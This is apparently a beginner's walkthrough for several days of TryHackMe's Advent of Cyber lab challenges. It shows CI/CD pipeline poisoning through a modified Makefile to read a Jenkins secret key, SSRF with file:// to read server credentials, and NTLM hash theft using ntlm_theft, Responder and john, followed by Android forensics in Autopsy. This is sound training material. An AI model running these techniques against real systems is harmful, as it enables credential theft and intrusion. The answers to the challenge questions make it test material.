Get started with Cyber Security in 24 Days - Learn the basics by doing a new, beginner-friendly security challenge every day leading up to Christmas.
Cover Image by BiZkettE1 on Freepik
It is strongly recommended to go through the reading material that accompanies each task before going through this guide. This article will only include the content necessary to answer the questions.
- Understand how a larger CI/CD environment operates.
- Explore indirect poisoned pipeline execution (PPE) and how it can be used to exploit Git.
- Apply CI/CD exploitation knowledge to the larger CI/CD environment.
In this challenge, we are told that AntarctiCrafts uses Gitea as their version control system (VCS) and Jenkins as their build platform. We need to find a way to poison the pipeline.
In the Attack Box navigate to:
http://10.10.95.76:3000. This will load the Gitea landing page. Use the login button to sign in.
We can see that there are 2 repositories in the VCS.
In a new tab navigate to:
http://10.10.95.76:8080/. This should open the login page for Jenkins.
In Jenkins, there is a build pipeline configured for the
Back in Gitea, the
gift-wrapper-pipeline repository contains the configuration for the Jenkins build pipelines.
We could modify this file to cause the pipeline to run malicious code. Let us clone this repo and modify the
sh 'make || true line to
git clone http://10.10.95.76:3000/McHoneyBell/gift-wrapper-pipeline.git
Once the code has been made save the file.
Now let us commit the changes back to the remote repository.
git add .
git commit -m "Updated Code"
Enter Gitea credentials when prompted. We see that we are not able to commit the changes since the branch is write-protected.
If we try to make a new branch and push the changes we will get the same error. This means that we cannot poison the pipeline using the pipeline configuration.
Now we need to find a file in the
gift-wrapper repository that can cause malicious code to be executed. The repository has a
Makefile. This file can execute system commands let’s see if we can modify this file.
git clone http://10.10.95.76:3000/McHoneyBell/gift-wrapper.git
Make the changes as shown in the below image:
Now let us commit the changes to the repository.
git add .
git commit -m "Changed Makefile"
Enter Gitea credentials when prompted. This time we can commit the changes to the remote repository.
In the Jenkins portal click on
gift-wrapper-build. Then click on
gift-wrapper-pipeline. This will bring you to the below page. Click on the green play button on the right side of the object named
There will be no change in the UI after clicking the button. Wait for a minute then click on the “Build History” button from the sidebar.
This will load the following page. Scroll to the bottom and click on the Console icon that is shown on the right-hand side for the task at the top (latest task).
Note: The task no. can be different in your case. Select the task that is on the top.
This will load a page where we can see the output of the pipeline. Scroll to the bottom and we should see the output of the commands we had added in the
1. What Linux kernel version is the Jenkins node?
2. What value is found from /var/lib/jenkins/secret.key?
To view the content that is present in this file we need to use the
cat command. We need to add a new command to the
Now we need to commit the changes and execute the pipeline once again (You need to repeat the steps starting from the Pushing Changes section).
If we view the output of the latest pipeline run the content of the file should be displayed.
- Understanding server-side request forgery (SSRF)
- Which different types of SSRF are used to exploit the vulnerability
- Prerequisites for exploiting the vulnerability
- How the attack works
- How to exploit the vulnerability
- Mitigation measures for protection
On the Attack Box in the
/etc/hosts file add the following:
Visit the following URL:
http://mcgreedysecretc2.thm. We are presented with the login page for the C2 server. Click on the “Accessing through API” link.
On the documentation page look at points 1 and 4. Point 1 shows how to access files on a remote server using the API. Point 4 tells us that
config.php contains the credentials for accessing the C2 server.
Since we want to access the files on the C2 server we need to modify the command that is provided to access local files instead of remote files. Instead of passing a URL to the
url parameter we can pass the path to a local file using
file:// (File URI scheme).
This gives us the content of the
Using the same technique we can open the
Using the credentials for the config file we can log into the dashboard of the C2 server.
1. Is SSRF the process in which the attacker tricks the server into loading only external resources (yea/nay)?
2. What is the C2 version?
The version is present on the footer of the dashboard.
3. What is the username for accessing the C2 panel?
4. What is the flag value after accessing the C2 panel?
Value is present on the top navigation bar
5. What is the flag value after stopping the data exfiltration from the McSkidy computer?
If we scroll down in the dashboard we see the PCs that have been infected. Click on Remove for
Click “Yes, remove it!”.
- The basics of network file shares
- Understanding NTLM authentication
- How NTLM authentication coercion attacks work
- How Responder works for authentication coercion attacks
- Forcing authentication coercion using
1. What is the name of the AD authentication protocol that makes use of tickets?
Based on the Day 11 task we know that Kerberos uses tickets
2. What is the name of the AD authentication protocol that makes use of the NTLM hash?
3. What is the name of the tool that can intercept these authentication challenges?
4. What is the password that McGreedy set for the Administrator account?
To retrieve the password we have to coarse McGreedy into authenticating with our device. When the authentication occurs we can capture the challenge packet which is encrypted using our NTLM hash. After extracting the hash from the challenge we can crack it offline using
ntlm_theft create a honeyfile that will force authentication when opened.
python3 ntlm_theft -g lnk -s 10.10.245.151 -f stealthy
In the above command -g is the file type, -s is our IP address and -f is the directory to store the created file.
Copy the file over the the SMB share which McGreedy frequently accesses.
smbclient //10.10.109.57/ElfShare/ -U guest%
On listing the content of the share we find
greedykeys.txt. Download the file as it should contain all the passwords that are used by McGreedy.
In a new tab start Responder. After some time when McGreedy opens our honeyfile, we will get the NTLM hash of our account.
responder -I ens5
In a new tab save the NTLM hash into a file called
john along with the password list we got from the file share to crack the hash.
john --wordlist=greedykeys.txt hash.txt
5. What is the value of the flag that is placed on the Administrator’s desktop?
We need to log in using the target using RDP. A popular RDP client on Linux is
On the Attack Box, you might encounter this popup. Click on Cancel.
Remmina launches click on the
+ icon on the left top corner. This will open the new connection window. Enter the target system IP along with the username and password that was captured.
Click on Connect to start the RDP session.
Accept the fingerprint of the remote server.
From the File Explorer sidebar click on
This PC -> Desktop. Open
- Procedures for collecting digital evidence
- The challenges with modern smartphones
- Using Autopsy Digital Forensics with an actual Android image
1. One of the photos contains a flag. What is it?
Launch Autopsy using the shortcut on Desktop. Select Open Recent Case.
Click on Open to launch the Case.
From the sidebar select
File Views -> File Types -> By Extension -> Images.
Change the view to Thumbnail view and select Large Thumbnails. Scroll through the images and you will find the blackboard.
The same image can also be found using the Table view.
2. What name does Tracy use to save Detective Frost-eau’s phone number?
Data Artifacts -> Communication Accounts -> Contacts.
The only entry with a detective in it is the second contact
3. One SMS exchanged with Van Sprinkles contains a password. What is it?
Data Artifacts -> Communication Accounts -> Messages.
We can see a conversion that took place with another contact.
When we look at the Text column we find the password in one of the messages.
If we look at the Contacts on the phone we see that McGreedy was speaking with Van Sprinkles.
Refer: Day 1 - Question 3
Refer: Day 23 - Question 4
Read: Day 5 premise on THM
Read: Day 10 premise on THM
Refer: Day 8 - Question 1
Refer: Day 9 - Questions 6 & 7
Refer: Day 19 - Question 5
Refer: Day 22 - Question 3
Refer: Day 24 - Question 3
1. What is the final flag?
1. What flag did you get after completing the survey?